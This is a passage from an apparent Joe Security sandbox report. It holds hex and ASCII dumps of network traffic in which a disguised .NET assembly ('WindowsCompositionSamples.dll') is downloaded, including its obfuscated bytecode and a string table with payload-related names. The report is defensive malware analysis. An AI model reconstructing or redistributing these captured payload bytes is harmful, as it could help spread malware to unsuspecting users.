2022-02-22 14:30:32 UTC 92 IN Data Raw: 00 58 fe 0e 00 00 38 7c f0 ff ff fe 0c 02 00 fe 0c 05 00 20 05 00 00 00 9c fe 0c 0b 00 fe 0c 05 00 7e 2d 00 00 04 fe 0c 00 00 fe 0c 07 00 58 4a 97 29 67 00 00 11 a2 fe 0c 05 00 20 01 00 00 00 58 fe 0e 05 00 fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 38 2f f0 ff ff fe 0c 02 00 fe 0c 05 00 20 01 00 00 00 59 20 02 00 00 00 9c fe 0c 13 00 fe 0c 05 00 20 01 00 00 00 59 8f 04 00 00 01 e0 fe 0c 13 00 fe 0c 05 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4c 7e 2d 00 00 04 fe 0c 00 00 fe 0c 07 00 58 4a 97 29 63 00 00 11 df fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 38 c9 ef ff ff fe 0c 02 00 fe 0c 05 00 20 02 00 00 00 59 20 05 00 00 00 9c fe 0c 0b 00 fe 0c 05 00 20 02 00 00 00 59 fe 0c 13 00 fe 0c 05 00 20 02 00 00 00 59 8f 04 00 00 01 e0 4d fe 0c 13 00 fe 0c 05 00 20 01 Data Ascii: X8| ~-XJ)g X X8/ Y Y YL~-XJ)c X8 Y Y YM
2022-02-22 14:30:32 UTC 96 IN Data Raw: 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 37 1a 00 00 20 1a 00 00 00 fe 0c 1c 00 3f 18 00 00 00 20 1a 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 d7 19 00 00 38 fe 0c 00 00 38 f9 0c 00 00 20 1c 00 00 00 fe 0c 1c 00 3f 18 00 00 00 20 1c 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 6c 1a 00 00 38 d3 0c 00 00 38 ce 0c 00 00 20 2b 00 00 00 fe 0c 1c 00 3f 06 02 00 00 20 2b 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 b4 1f 00 00 20 24 00 00 00 fe 0c 1c 00 3f fc 00 00 00 20 24 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 18 1d 00 00 20 20 00 00 00 fe 0c 1c 00 3f 64 00 00 00 20 20 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 45 1b 00 00 20 1e 00 00 00 fe 0c 1c 00 3f 18 00 00 00 20 1e 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 9e 1a 00 00 38 45 0c 00 00 20 1f 00 00 00 fe 0c 1c 00 3f 18 00 00 00 20 Data Ascii: =87 ? =888 ? =8l88 +? +=8 $? $=8 ?d =8E ? =88E ?
2022-02-22 14:30:32 UTC 100 IN Data Raw: 0e 0c 00 20 00 00 00 00 fe 0e 09 00 fe 0c 24 00 fe 0c 24 00 fe 0c 16 00 58 20 18 00 00 00 58 fe 0c 03 00 58 4a 58 fe 0e 02 00 fe 0c 2d 00 fe 0c 21 00 fe 0c 10 00 a2 fe 0c 22 00 fe 0c 21 00 fe 0c 16 00 9e fe 0c 27 00 fe 0c 21 00 20 00 00 00 00 9e fe 0c 21 00 20 01 00 00 00 58 fe 0e 21 00 38 0f 00 00 00 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 10 00 7a 00 00 dd af ea ff ff fe 0c 24 00 fe 0c 02 00 fe 0c 03 00 58 4a 58 fe 0e 02 00 dd 97 ea ff ff 00 dd 91 ea ff ff fe 0c 05 00 fe 0c 09 00 8f 04 00 00 01 e0 fe 0c 02 00 fe 0c 03 00 58 4a 54 fe 0c 0f 00 fe 0c 09 00 20 00 00 00 00 9c fe 0c 09 00 20 01 00 00 00 58 fe 0e 09 00 fe 0c 02 00 20 08 00 00 00 58 fe 0e 02 00 dd 49 ea ff ff fe 0c 15 00 fe 0c 09 00 20 01 00 00 00 59 fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 8f 04 Data Ascii: $$X XXJX-!"!'! ! X!8 z$XJXXJT X XI Y Y
2022-02-22 14:30:32 UTC 104 IN Data Raw: fe 0c 0b 00 fe 0c 02 00 fe 0c 03 00 58 4a 8f 12 00 00 01 47 54 fe 0c 15 00 fe 0c 09 00 14 a2 fe 0c 09 00 20 01 00 00 00 58 fe 0e 09 00 fe 0c 02 00 20 08 00 00 00 58 fe 0e 02 00 dd 65 da ff ff fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 20 00 00 00 00 fe 01 fe 0c 02 00 fe 0c 03 00 58 4a fe 0c 02 00 20 08 00 00 00 58 fe 0c 03 00 58 4a 59 5a fe 0c 02 00 20 08 00 00 00 58 fe 0c 03 00 58 4a 58 fe 0c 24 00 58 fe 0e 02 00 fe 0c 09 00 20 01 00 00 00 59 fe 0e 09 00 dd 00 da ff ff fe 0c 0f 00 fe 0c 09 00 20 03 00 00 00 59 20 05 00 00 00 9c fe 0c 15 00 fe 0c 09 00 20 03 00 00 00 59 fe 0c 15 00 fe 0c 09 00 20 03 00 00 00 59 9a 74 20 00 00 01 fe 0c 15 00 fe 0c 09 00 20 02 00 00 00 59 9a 74 20 00 00 01 fe 0c 15 00 fe 0c 09 00 20 01 00 00 00 59 9a 74 Data Ascii: XJGT X Xe YJ XJ XXJYZ XXJX$X Y Y Y Yt Yt Yt
2022-02-22 14:30:32 UTC 108 IN Data Raw: 01 e0 fe 0c 15 00 fe 0c 09 00 20 06 00 00 00 59 9a 74 11 00 00 02 fe 0c 05 00 fe 0c 09 00 20 05 00 00 00 59 8f 04 00 00 01 e0 4d fe 0c 05 00 fe 0c 09 00 20 04 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 15 00 fe 0c 09 00 20 03 00 00 00 59 9a 74 11 00 00 1b fe 0c 05 00 fe 0c 09 00 20 02 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 15 00 fe 0c 09 00 20 01 00 00 00 59 9a fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 1a 00 fe 0c 0b 00 fe 0c 13 00 7e 30 00 00 04 fe 0c 29 00 fe 0c 09 00 20 01 00 00 00 59 94 97 29 82 00 00 11 7e 30 00 00 04 fe 0c 02 00 fe 0c 03 00 58 4a 97 29 86 00 00 11 54 fe 0c 09 00 20 05 00 00 00 59 fe 0e 09 00 fe 0c 02 00 20 08 00 00 00 58 fe 0e 02 00 dd 36 c9 ff ff fe 0c 0f 00 fe 0c 09 00 20 02 00 00 00 59 20 00 00 00 00 9c fe Data Ascii: Yt YM YJ Yt YJ Y YJ~0) Y)~0XJ)T Y X6 Y
2022-02-22 14:30:32 UTC 112 IN Data Raw: 0e 0c 00 fe 0c 0d 00 fe 0c 0c 00 58 20 02 00 00 00 5b fe 0e 16 00 fe 0c 24 00 20 35 20 00 00 58 fe 0c 16 00 20 18 00 00 00 5a 58 fe 0c 03 00 58 4a fe 0e 19 00 fe 0c 24 00 20 35 20 00 00 58 fe 0c 16 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 03 00 58 4a fe 0e 01 00 fe 0c 11 00 fe 0c 19 00 fe 0c 01 00 58 3c 16 00 00 00 fe 0c 19 00 fe 0c 11 00 3d 1c 00 00 00 fe 0c 16 00 38 26 00 00 00 fe 0c 16 00 20 01 00 00 00 58 fe 0e 0d 00 38 6e ff ff ff fe 0c 16 00 20 01 00 00 00 59 fe 0e 0c 00 38 5b ff ff ff 00 fe 0e 1d 00 fe 0c 24 00 20 35 20 00 00 58 fe 0c 1d 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 03 00 58 4a fe 0e 20 00 fe 0c 20 00 fe 0e 17 00 20 ff ff ff ff fe 0c 17 00 40 0e 00 00 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 06 00 7a 00 fe 0c 24 00 fe 0c 17 00 Data Ascii: X [$ 5 X ZXXJ$ 5 X ZX XXJX<=8& X8n Y8[$ 5 X ZX XXJ @ z$
2022-02-22 14:30:32 UTC 116 IN Data Raw: 00 00 00 fe 06 a4 00 00 06 9b 7e 2b 00 00 04 20 01 00 00 00 fe 06 a5 00 00 06 9b 7e 2b 00 00 04 20 02 00 00 00 fe 06 a6 00 00 06 9b 7e 2b 00 00 04 20 03 00 00 00 fe 06 a7 00 00 06 9b 7e 2b 00 00 04 20 04 00 00 00 fe 06 a8 00 00 06 9b 7e 2b 00 00 04 20 05 00 00 00 fe 06 a9 00 00 06 9b 7e 2b 00 00 04 20 06 00 00 00 fe 06 aa 00 00 06 9b 7e 2b 00 00 04 20 07 00 00 00 fe 06 ab 00 00 06 9b 7e 2b 00 00 04 20 08 00 00 00 fe 06 ac 00 00 06 9b 7e 2b 00 00 04 20 09 00 00 00 fe 06 ad 00 00 06 9b 7e 2b 00 00 04 20 0a 00 00 00 fe 06 ae 00 00 06 9b 7e 2b 00 00 04 20 0b 00 00 00 fe 06 af 00 00 06 9b 7e 2b 00 00 04 20 0c 00 00 00 fe 06 b0 00 00 06 9b 7e 2b 00 00 04 20 0d 00 00 00 fe 06 b1 00 00 06 9b 7e 2b 00 00 04 20 0e 00 00 00 fe 06 b2 00 00 06 9b 2a 5a fe 09 00 00 fe Data Ascii: ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ *Z
2022-02-22 14:30:32 UTC 120 IN Data Raw: fe 0c 0a 00 fe 0c 04 00 20 01 00 00 00 59 9a 74 14 00 00 01 7e 42 00 00 04 fe 0c 0c 00 fe 0c 10 00 58 4a 97 29 97 00 00 11 a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 4a f9 ff ff fe 0c 0d 00 fe 0c 04 00 20 02 00 00 00 59 20 05 00 00 00 9c fe 0c 0a 00 fe 0c 04 00 20 02 00 00 00 59 fe 0c 0a 00 fe 0c 04 00 20 02 00 00 00 59 9a 74 20 00 00 01 fe 0c 0a 00 fe 0c 04 00 20 01 00 00 00 59 9a 74 3f 00 00 01 7e 42 00 00 04 fe 0c 0c 00 fe 0c 10 00 58 4a 97 29 98 00 00 11 a2 fe 0c 04 00 20 01 00 00 00 59 fe 0e 04 00 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 c9 f8 ff ff fe 0c 12 00 fe 0c 0c 00 fe 0c 10 00 58 4a fe 0c 0a 00 fe 0c 04 00 20 01 00 00 00 59 9a a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 fe 0c 04 00 20 01 00 00 00 59 fe 0e 04 00 38 8a f8 ff ff fe 0c Data Ascii: Yt~BXJ) X8J Y Y Yt Yt?~BXJ) Y X8XJ Y X Y8
2022-02-22 14:30:32 UTC 124 IN Data Raw: 45 00 00 04 20 00 00 00 00 fe 06 36 01 00 06 9b 7e 45 00 00 04 20 01 00 00 00 fe 06 37 01 00 06 9b 2a 2a fe 09 00 00 28 6b 00 00 0a 2a 00 00 00 13 30 03 00 21 00 00 00 00 00 00 00 20 01 00 00 00 8d 06 00 00 01 80 46 00 00 04 7e 46 00 00 04 20 00 00 00 00 fe 06 39 01 00 06 9b 2a 1a 7e 44 00 00 04 2a 13 30 03 00 21 00 00 00 00 00 00 00 20 01 00 00 00 8d 06 00 00 01 80 47 00 00 04 7e 47 00 00 04 20 00 00 00 00 fe 06 3b 01 00 06 9b 2a 00 00 00 13 30 05 00 f5 02 00 00 a0 00 00 11 fe 0d 02 00 25 20 01 00 00 00 54 46 fe 0e 0c 00 fe 0c 0c 00 20 04 00 00 00 5a fe 0e 0a 00 fe 0c 0c 00 20 08 00 00 00 5a fe 0e 00 00 20 01 00 00 00 8d 01 00 00 01 fe 0e 06 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 09 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 05 00 20 01 00 00 00 8d 04 00 00 Data Ascii: E 6~E 7**(k*0! F~F 9*~D*0! G~G ;*0% TF Z Z
2022-02-22 14:30:32 UTC 128 IN Data Raw: 1d 1d 00 00 00 ff ff ff ff ff ff ff ff 01 01 02 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 04 00 00 00 04 04 00 00 00 05 00 00 00 70 70 00 00 00 06 00 00 00 04 04 00 00 00 07 00 00 00 01 01 00 00 00 08 00 00 00 03 03 00 00 00 09 00 00 00 03 03 00 00 00 0a 00 00 00 01 01 00 00 00 0b 00 00 00 02 02 00 00 00 0c 00 00 00 02 02 00 00 00 01 01 05 00 00 00 a5 a5 00 00 00 06 00 00 00 04 04 00 00 00 0d 00 00 00 03 03 00 00 00 0e 00 00 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 10 00 00 00 26 26 00 00 00 00 00 00 a5 a5 00 00 00 01 11 00 00 00 fe fe 00 00 00 06 00 00 00 04 04 00 00 00 12 13 14 00 00 00 00 00 00 00 00 15 0e 00 00 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 16 00 00 00 fa fa 00 00 00 00 00 00 e7 e7 00 00 00 06 00 00 00 04 04 00 00 00 17 00 Data Ascii: pp&&
2022-02-22 14:30:32 UTC 132 IN Data Raw: 00 03 03 00 00 00 13 00 00 00 c2 c2 00 00 00 01 02 00 00 00 00 00 00 00 00 04 00 00 00 03 03 00 00 00 13 00 00 00 c2 c2 00 00 00 14 00 00 00 03 03 00 00 00 15 01 00 00 00 02 02 00 00 00 02 03 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 05 5d 00 00 00 00 00 00 9a 9a 00 00 00 18 5d 2b 5d 38 5d 2f 5d 24 5d 29 5d 35 5d 34 5d 33 5d 3a 5d 09 5d 32 5d 32 5d 31 5d 3f 5d 3c 5d 2f 5d 6f 5d 6e 5d 18 5d 2b 5d 38 5d 2f 5d 24 5d 29 5d 35 5d 34 5d 33 5d 3a 5d 09 5d 32 5d 32 5d 31 5d 3f 5d 3c 5d 2f 5d 31 5d 38 5d 33 5d 2f 5d 18 5d 2b 5d 38 5d 2f 5d 24 5d 29 5d 35 5d 34 5d 33 5d 3a 5d 09 5d 32 5d 32 5d 31 5d 3f 5d 3c 5d 2f 5d 38 5d 36 5d 18 5d 2b 5d 38 5d 2f 5d 24 5d 29 5d 35 5d 34 5d 33 5d 3a 5d 09 5d 32 5d 32 5d 31 5d 3f 5d 3c 5d 2f 5d Data Ascii: ]]+]8]/]$])]5]4]3]:]]2]2]1]?]<]/]o]n]]+]8]/]$])]5]4]3]:]]2]2]1]?]<]/]1]8]3]/]]+]8]/]$])]5]4]3]:]]2]2]1]?]<]/]8]6]]+]8]/]$])]5]4]3]:]]2]2]1]?]<]/]
2022-02-22 14:30:32 UTC 136 IN Data Raw: 65 0c 65 29 65 2f 65 34 65 31 65 22 65 11 65 0b 65 0a 65 26 65 01 65 32 65 12 65 30 65 1c 65 34 65 01 65 36 65 30 65 0c 65 29 65 2f 65 34 65 31 65 22 65 11 65 04 65 00 65 17 65 32 65 12 65 30 65 1c 65 34 65 01 65 36 65 30 65 0c 65 29 65 2f 65 34 65 31 65 22 65 11 65 0d 65 31 65 11 65 32 65 12 65 30 65 1c 65 34 65 01 65 36 65 30 65 0c 65 29 65 2f 65 34 65 31 65 22 65 11 65 00 65 22 65 65 65 07 01 05 00 00 00 21 21 00 00 00 02 00 00 00 01 01 00 00 00 06 b0 00 00 00 00 00 00 20 20 00 00 00 e7 b0 c7 b0 e5 b0 c9 b0 e1 b0 d4 b0 e3 b0 e5 b0 d9 b0 fc b0 fa b0 e1 b0 e4 b0 f7 b0 c4 b0 b0 b0 07 01 05 00 00 00 21 21 00 00 00 08 00 00 00 00 00 00 00 00 09 00 00 00 11 11 00 00 00 02 00 00 00 02 02 00 00 00 03 04 00 00 00 21 21 00 00 00 05 00 00 00 21 21 00 00 00 02 00 Data Ascii: ee)e/e4e1e"eeee&ee2ee0ee4ee6e0ee)e/e4e1e"eeeee2ee0ee4ee6e0ee)e/e4e1e"eee1ee2ee0ee4ee6e0ee)e/e4e1e"eee"eee!! !!!!!!
2022-02-22 14:30:32 UTC 140 IN Data Raw: 1b 00 00 00 4a 00 00 00 1c 1c 00 00 00 02 00 00 00 00 00 00 00 00 2b 2c 00 00 00 04 04 00 00 00 2d 00 00 00 04 04 00 00 00 2e 00 00 14 77 77 14 00 00 00 00 14 6d 6d 14 00 00 34 00 00 00 14 14 00 00 00 35 01 39 00 00 00 04 04 00 00 00 39 00 00 00 06 06 00 00 00 4b 00 00 14 ea ea 14 00 00 00 00 14 9b 9b 14 00 00 4c 00 00 00 0b 0b 00 00 00 23 00 00 00 0a 0a 00 00 00 00 00 00 0d 0d 00 00 00 48 00 00 00 1a 1a 00 00 00 39 00 00 00 06 06 00 00 00 4d 00 00 00 1d 1d 00 00 00 02 00 00 00 00 00 00 00 00 4b 00 00 14 fc fc 14 00 00 00 00 14 ea ea 14 00 00 02 00 00 00 00 00 00 00 00 43 00 00 15 05 05 15 00 00 02 00 00 00 01 01 00 00 00 01 2c 00 00 00 04 04 00 00 00 2d 00 00 00 04 04 00 00 00 2e 00 00 15 60 60 15 00 00 00 00 15 56 56 15 00 00 74 00 00 15 56 56 15 00 00 Data Ascii: J+,-.wwmm4599KL#H9MKC,-.``VVtVV
2022-02-22 14:30:32 UTC 144 IN Data Raw: 23 06 00 01 00 0a 05 0e 00 d3 3a 5a 2a 06 00 1e 00 0a 05 06 00 f5 2e 6c 35 06 00 1d 0d b9 23 06 00 e2 1d b9 23 0e 00 bf 0f 5a 2a 0e 00 5f 16 5a 2a 0e 00 b5 0a 5a 2a 0e 00 de 38 5a 2a 06 00 2c 00 0a 05 06 00 11 0d 6c 35 06 00 45 00 b9 23 16 00 12 0d 6a 2a 06 00 33 18 00 31 06 00 6a 16 00 31 12 00 b8 26 d6 2f 06 00 34 15 6c 35 12 00 84 0f d6 2f 06 00 be 20 ba 30 06 00 b6 15 b9 23 0a 00 3e 35 d9 30 06 00 f5 1c 82 3c 06 00 b0 2a b9 23 06 00 20 3e b9 23 0a 00 b7 36 d9 30 06 00 5e 2d b9 23 06 00 a3 2b b9 23 0a 00 97 04 d9 30 0a 00 23 34 25 05 06 00 ad 15 b9 23 06 00 8b 3a b9 23 06 00 98 1e b9 23 06 00 ea 12 b9 23 06 00 be 2b 65 31 06 00 cf 28 76 26 06 00 78 3f a6 26 12 00 4b 15 36 26 12 00 56 15 36 26 06 00 1c 19 a6 26 06 00 46 17 a6 26 06 00 ba 17 a6 26 06 00 Data Ascii: #:Z*.l5##Z*_Z*Z*8Z*,l5E#j*31j1&/4l5/ 0#>50<*# >#60^-#+#0#4%#:###+e1(v&x?&K6&V6&&F&&
2022-02-22 14:30:32 UTC 148 IN Data Raw: 85 51 00 00 00 00 16 00 9b 29 ef 02 35 00 20 e9 01 00 00 00 11 00 53 06 40 00 35 00 4d e9 01 00 00 00 16 00 16 2a c8 06 35 00 5c e9 01 00 00 00 16 00 90 05 0f 09 35 00 b5 23 00 00 00 00 16 00 51 10 35 00 35 00 6b e9 01 00 00 00 16 00 08 22 15 09 35 00 76 e9 01 00 00 00 16 00 d8 1f 1d 09 35 00 81 e9 01 00 00 00 16 00 ff 1d 25 09 35 00 5a 50 00 00 00 00 16 00 c6 20 23 02 35 00 8c e9 01 00 00 00 16 00 41 0d 2b 09 35 00 97 e9 01 00 00 00 16 00 71 28 32 09 35 00 a2 e9 01 00 00 00 16 00 c3 04 37 09 35 00 b5 e9 01 00 00 00 16 00 e5 2e 3e 09 35 00 0e 23 01 00 00 00 16 00 e0 27 2a 04 35 00 19 23 01 00 00 00 16 00 77 38 30 04 35 00 c0 e9 01 00 00 00 16 00 85 0c 45 09 35 00 c7 e9 01 00 00 00 16 00 a8 3e 4a 09 35 00 d8 e9 01 00 00 00 11 00 d0 3b 40 00 35 00 f3 ea 01 Data Ascii: Q)5 S@5M*5\5#Q55k"5v5%5ZP #5A+5q(2575.>5#'*5#w805E5>J5;@5
Timestamp   kBytes transferred   Direction   Data
Copyright Joe Security LLC 2022 Page 44 of 65
2022-02-22 14:30:32 UTC 152 IN Data Raw: 02 a3 00 2b 00 7a 00 c3 00 2b 00 7a 00 c3 00 03 01 96 03 c9 00 f3 01 6f 00 e3 00 2b 00 7a 00 e3 00 fb 01 6f 00 e3 00 1b 00 6f 00 e9 00 f3 01 6f 00 03 01 fb 01 6f 00 03 01 1b 00 6f 00 03 01 2b 00 7a 00 09 01 f3 01 6f 00 20 01 3b 00 6f 00 20 01 2b 00 7a 00 29 01 2b 00 08 0e 49 01 2b 00 08 0e 89 01 8b 00 08 0f a0 01 1b 00 6f 00 c0 01 3b 00 6f 00 e0 01 3b 00 6f 00 00 02 3b 00 6f 00 20 02 3b 00 6f 00 e3 02 9b 00 6f 00 e3 02 1b 00 6f 00 e3 02 fb 01 6f 00 e3 02 33 00 17 0e e3 02 93 00 6f 00 03 03 33 00 ae 0e 03 03 fb 01 6f 00 03 03 2b 00 08 0e 23 03 1b 00 6f 00 23 03 93 00 6f 00 23 03 9b 00 6f 00 23 03 fb 01 6f 00 60 04 2b 00 7a 00 60 04 3b 00 6f 00 80 04 3b 00 6f 00 80 04 2b 00 7a 00 a0 04 3b 00 6f 00 a0 04 2b 00 7a 00 c0 04 2b 00 7a 00 c0 04 3b 00 6f 00 e0 04 Data Ascii: +z+zo+zooooo+zo ;o +z)+I+o;o;o;o ;oooo3o3o+#o#o#o#o`+z`;o;o+z;o+z+z;o
2022-02-22 14:30:32 UTC 156 IN Data Raw: 65 67 69 73 74 72 61 74 69 6f 6e 53 65 72 76 69 63 65 73 54 69 63 6b 73 50 65 72 53 65 63 6f 6e 64 00 41 64 64 4f 70 63 6f 64 65 67 65 74 53 65 63 6f 6e 64 00 73 65 74 53 6f 61 70 41 63 74 69 6f 6e 52 65 73 6f 75 72 63 65 4d 61 6e 61 67 65 72 4e 65 75 74 72 61 6c 52 65 73 6f 75 72 63 65 73 46 6f 75 6e 64 00 43 72 65 61 74 65 53 69 67 6e 61 74 75 72 65 52 65 73 6f 75 72 63 65 4d 61 6e 61 67 65 72 4e 65 75 74 72 61 6c 52 65 73 6f 75 72 63 65 73 4e 6f 74 46 6f 75 6e 64 00 52 65 6d 6f 76 65 4f 6e 4c 6f 67 4d 65 73 73 61 67 65 67 65 74 49 73 47 65 6e 65 72 69 63 4d 65 74 68 6f 64 00 50 72 65 63 6f 6e 64 69 74 69 6f 6e 49 6e 76 6f 6b 65 4d 65 74 68 6f 64 00 54 61 72 67 65 74 4d 65 74 68 6f 64 00 53 65 74 44 61 74 61 4f 65 6d 50 65 72 69 6f 64 00 57 69 6e 64 6f Data Ascii: egistrationServicesTicksPerSecondAddOpcodegetSecondsetSoapActionResourceManagerNeutralResourcesFoundCreateSignatureResourceManagerNeutralResourcesNotFoundRemoveOnLogMessagegetIsGenericMethodPreconditionInvokeMethodTargetMethodSetDataOemPeriodWindo
2022-02-22 14:30:32 UTC 160 IN Data Raw: 4d 75 6c 74 69 63 61 73 74 44 65 6c 65 67 61 74 65 00 43 6f 64 65 50 61 67 65 49 73 55 6e 6b 6e 6f 77 6e 53 75 72 72 6f 67 61 74 65 00 55 6e 6b 6e 6f 77 6e 48 6f 73 74 43 61 6e 47 65 6e 65 72 61 74 65 00 44 65 6c 65 67 61 74 65 41 73 79 6e 63 53 74 61 74 65 00 45 64 69 74 6f 72 42 72 6f 77 73 61 62 6c 65 53 74 61 74 65 00 44 69 67 69 74 53 75 62 73 74 69 74 75 74 69 6f 6e 67 65 74 41 73 73 65 6d 62 6c 79 49 73 50 72 69 76 61 74 65 00 53 74 72 69 6e 67 54 6f 48 47 6c 6f 62 61 6c 55 6e 69 56 6f 6c 61 74 69 6c 65 57 72 69 74 65 00 58 41 74 74 72 69 62 75 74 65 00 43 6f 6d 70 69 6c 65 72 47 65 6e 65 72 61 74 65 64 41 74 74 72 69 62 75 74 65 00 47 75 69 64 41 74 74 72 69 62 75 74 65 00 48 65 6c 70 4b 65 79 77 6f 72 64 41 74 74 72 69 62 75 74 65 00 47 65 6e 65 Data Ascii: MulticastDelegateCodePageIsUnknownSurrogateUnknownHostCanGenerateDelegateAsyncStateEditorBrowsableStateDigitSubstitutiongetAssemblyIsPrivateStringToHGlobalUniVolatileWriteXAttributeCompilerGeneratedAttributeGuidAttributeHelpKeywordAttributeGene
2022-02-22 14:30:32 UTC 164 IN Data Raw: 69 6f 6e 00 53 79 73 74 65 6d 2e 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 00 41 64 64 41 6e 6e 6f 74 61 74 69 6f 6e 00 41 70 70 65 6e 64 41 6c 6c 4c 69 6e 65 73 54 6f 6b 65 6e 45 6c 65 76 61 74 69 6f 6e 00 53 79 73 74 65 6d 2e 47 6c 6f 62 61 6c 69 7a 61 74 69 6f 6e 00 43 75 72 72 65 6e 74 54 68 72 65 61 64 73 65 74 53 6f 61 70 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 50 72 6f 63 65 73 73 4d 6f 64 75 6c 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 43 6c 65 61 6e 55 70 4d 61 6e 61 67 65 64 44 61 74 61 4e 6f 64 65 4b 65 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 65 6e 65 72 61 74 65 52 65 66 65 72 65 6e 63 65 4b 65 79 43 6f 6c 6c 65 63 74 69 6f 6e 00 44 6f 4e 6f 74 41 64 64 72 4f 66 43 73 70 50 61 72 65 6e 74 57 69 6e 64 6f Data Ascii: ionSystem.ConfigurationAddAnnotationAppendAllLinesTokenElevationSystem.GlobalizationCurrentThreadsetSoapActionSystem.ReflectionProcessModuleCollectionCleanUpManagedDataNodeKeyValueCollectionGenerateReferenceKeyCollectionDoNotAddrOfCspParentWindo
2022-02-22 14:30:32 UTC 168 IN Data Raw: 4f 70 65 72 61 74 6f 72 73 00 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 00 70 72 6f 63 65 73 73 00 67 65 74 50 61 79 6c 6f 61 64 4e 61 6d 65 73 61 64 64 43 61 6e 63 65 6c 4b 65 79 50 72 65 73 73 00 67 65 74 5f 42 61 73 65 41 64 64 72 65 73 73 00 61 64 64 72 65 73 73 00 44 61 79 6c 69 67 68 74 44 65 6c 74 61 67 65 74 44 69 73 61 6c 6c 6f 77 42 69 6e 64 69 6e 67 52 65 64 69 72 65 63 74 73 00 43 6f 6e 74 61 69 6e 73 4e 6f 6e 43 6f 64 65 41 63 63 65 73 73 50 65 72 6d 69 73 73 69 6f 6e 73 67 65 74 4e 61 6d 65 64 50 65 72 6d 69 73 73 69 6f 6e 53 65 74 73 00 49 53 4f 43 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 47 65 74 4f 62 6a 65 63 74 73 46 6f 72 4e 61 74 69 76 65 56 61 72 69 61 6e 74 73 00 42 67 65 74 44 65 63 6c 61 72 65 64 45 76 65 6e 74 73 00 67 65 Data Ascii: OperatorsGetCurrentProcessprocessgetPayloadNamesaddCancelKeyPressget_BaseAddressaddressDaylightDeltagetDisallowBindingRedirectsContainsNonCodeAccessPermissionsgetNamedPermissionSetsISOCurrencySymbolGetObjectsForNativeVariantsBgetDeclaredEventsge
2022-02-22 14:30:32 UTC 172 IN Data Raw: 0f 05 08 08 12 00 03 12 20 1d 0e 1d 12 80 8d 15 12 80 95 01 12 80 89 0d 00 02 15 12 80 9d 02 12 71 12 71 1c 18 09 15 12 80 9d 02 12 71 12 71 17 00 02 15 12 6d 01 12 71 15 12 6d 01 12 71 15 12 80 9d 02 12 71 12 71 0a 00 01 15 12 6d 01 1c 12 80 99 0b 00 02 15 12 80 9d 02 1c 1c 1c 18 05 15 12 6d 01 1c 07 15 12 80 9d 02 1c 1c 13 00 02 15 12 6d 01 1c 15 12 6d 01 1c 15 12 80 9d 02 1c 1c 26 07 14 05 1d 1c 08 08 08 1d 04 45 1d 08 1d 1c 08 1d 0a 1d 08 1d 05 0f 05 0f 05 45 1d 0a 08 0f 05 08 45 1d 04 1d 08 07 00 01 12 80 89 12 71 08 00 01 12 80 89 12 80 89 06 00 01 02 12 80 89 08 00 01 12 80 8d 12 80 91 08 00 01 12 80 85 12 80 89 06 00 01 0e 12 80 85 05 00 02 02 0e 0e 09 00 02 02 12 80 8d 12 80 8d 06 00 01 01 12 80 89 0b 00 01 08 15 12 80 95 01 12 80 89 0e 00 02 12 Data Ascii: qqqqmqmqqqmmmm&EEEq
2022-02-22 14:30:32 UTC 176 IN Data Raw: 00 6f 00 73 00 69 00 74 00 69 00 6f 00 6e 00 53 00 61 00 6d 00 70 00 6c 00 65 00 73 00 2e 00 64 00 6c 00 6c 00 00 00 48 00 12 00 01 00 4c 00 65 00 67 00 61 00 6c 00 43 00 6f 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6f 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 a9 00 20 00 20 00 32 00 30 00 32 00 32 00 00 00 64 00 1e 00 01 00 4f 00 72 00 69 00 67 00 69 00 6e 00 61 00 6c 00 46 00 69 00 6c 00 65 00 6e 00 61 00 6d 00 65 00 00 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 43 00 6f 00 6d 00 70 00 6f 00 73 00 69 00 74 00 69 00 6f 00 6e 00 53 00 61 00 6d 00 70 00 6c 00 65 00 73 00 2e 00 64 00 6c 00 6c 00 00 00 54 00 1a 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 57 00 69 00 6e 00 64 00 6f 00 77 00 Data Ascii: ositionSamples.dllHLegalCopyrightCopyright 2022dOriginalFilenameWindowsCompositionSamples.dllTProductNameWindow
